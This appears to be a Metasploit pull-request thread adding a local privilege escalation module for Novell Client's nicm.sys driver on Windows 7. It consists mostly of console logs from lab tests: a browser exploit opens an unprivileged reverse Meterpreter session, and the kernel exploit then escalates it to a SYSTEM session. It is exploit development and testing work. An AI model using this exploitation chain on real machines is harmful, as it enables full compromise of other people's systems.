Add module for OSVDB 93718

[jvazquez-r7]

Windows Local Privilege Escalation through the nicm.sys driver installed with Novell Client 2 SP3 for Windows 7.

Software can be downloaded from: http://download.novell.com/Download?buildid=WVA4kcizKVw~

Tested successfully on Windows 7 SP1 with Novell Client 2 SP3. In order to test first of all an unprivileged meterpreter session is needed. It can be accomplished with msfpayload or with an existing exploit. I love the browser exploit / window kernel exploit combo to bypass IE protected mode and escalate all the privs :P

• Get unprivileged session (did with ms13_037_svg_dashstyle just for fun but anything can be used)

msf > use exploit/windows/browser/ms13_037_svg_dashstyle 
msf exploit(ms13_037_svg_dashstyle) > set URIPATH /
URIPATH => /
msf exploit(ms13_037_svg_dashstyle) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.4:4444 
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.0.4:8080/
[*] Server started.
msf exploit(ms13_037_svg_dashstyle) > [*] 192.168.0.4      ms13_037_svg_dashstyle - Requesting: /
[*] 192.168.0.4      ms13_037_svg_dashstyle - Target selected as: IE 8 on Windows 7 SP1 with JRE ROP
[*] 192.168.0.4      ms13_037_svg_dashstyle - Using JRE ROP
[*] 192.168.0.4      ms13_037_svg_dashstyle - Sending HTML to trigger...
[*] Sending stage (751104 bytes) to 192.168.0.4
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:51861) at 2013-06-24 23:48:48 -0500
[*] Session ID 1 (192.168.0.4:4444 -> 192.168.0.4:51861) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2368)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 816
[+] Successfully migrated to process 

msf exploit(ms13_037_svg_dashstyle) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Users\Juan Vazquez\Desktop
meterpreter > mkdir pwn
Creating directory: pwn
[-] stdapi_fs_mkdir: Operation failed: Access is denied.
meterpreter > background
[*] Backgrounding session 1...

• Exploit the local kernel vuln and get a new powerful session!

msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/novell_client_nicm 
msf exploit(novell_client_nicm) > set session 1
session => 1
msf exploit(novell_client_nicm) > check
[*] The target service is running, but could not be validated.
msf exploit(novell_client_nicm) > rexploit
[*] Reloading module...

[-] Handler failed to bind to 192.168.0.4:4444
[*] Started reverse handler on 0.0.0.0:4444 
[*] Detecting the target system...
[*] Running against Windows 7 SP1
[*] Checking device...
[+] \\.\nicm found!
[*] Storing the Kernel stager on memory...
[*] {"GetLastError"=>0, "return"=>0, "BaseAddress"=>"\x00\x00\r\r", "RegionSize"=>"\x00\x10\x00\x00"}
[*] Fixnum : 218955776
[*] Triggering the vulnerability to execute the Kernel Handler
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Storing the final payload on memory...
[*] {"GetLastError"=>0, "return"=>0, "BaseAddress"=>"\x00\x00\f\f", "RegionSize"=>"\x00\x10\x00\x00"}
[+] Contents successfully written to 0xc0c0000
[*] Executing the payload...
[*] Sending stage (751104 bytes) to 192.168.0.4
[+] Enjoy!
[*] Meterpreter session 2 opened (192.168.0.4:4444 -> 192.168.0.4:51864) at 2013-06-24 23:49:33 -0500
[*] Exploit completed, but no session was created.
msf exploit(novell_client_nicm) > 
[*] Session ID 2 (192.168.0.4:4444 -> 192.168.0.4:51864) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: notepad.exe (816)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2784
[+] Successfully migrated to process 

msf exploit(novell_client_nicm) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  192.168.0.4:4444 -> 192.168.0.4:51861 (192.168.172.196)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-RNJ7NBRK9L7           192.168.0.4:4444 -> 192.168.0.4:51864 (192.168.172.196)

msf exploit(novell_client_nicm) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Users\Juan Vazquez\Desktop
meterpreter > mkdir pwn
Creating directory: pwn
meterpreter > cd pwn
meterpreter > pwd
C:\Users\Juan Vazquez\Desktop\pwn
meterpreter > exit
[*] Shutting down Meterpreter...

[wchen-r7]

Works for me, module description reads good, passes msftidy..... merging:

msf exploit(novell_client_nicm) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Adding the railgun stuff...
[*] Detecting the target system...
[*] Running against Windows 7 SP1
[*] Checking device...
[+] \\.\nicm found!
[*] Storing the Kernel stager on memory...
[+] Memory allocated at 0xd0d0000
[+] 0xd0d0000 is now writable
[+] Contents successfully written to 0xd0d0000
[*] Triggering the vulnerability to execute the Kernel Handler
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Storing the final payload on memory...
[+] Memory allocated at 0xc0c0000
[+] 0xc0c0000 is now writable
[+] Contents successfully written to 0xc0c0000
[*] Executing the payload...
[*] Creating the thread to execute the shellcode...
[*] Resuming the Thread...
[*] Sending stage (751104 bytes) to 10.0.1.78
[+] Enjoy!
[*] Meterpreter session 3 opened (10.0.1.76:4444 -> 10.0.1.78:49159) at 2013-06-25 02:24:02 -0500

meterpreter >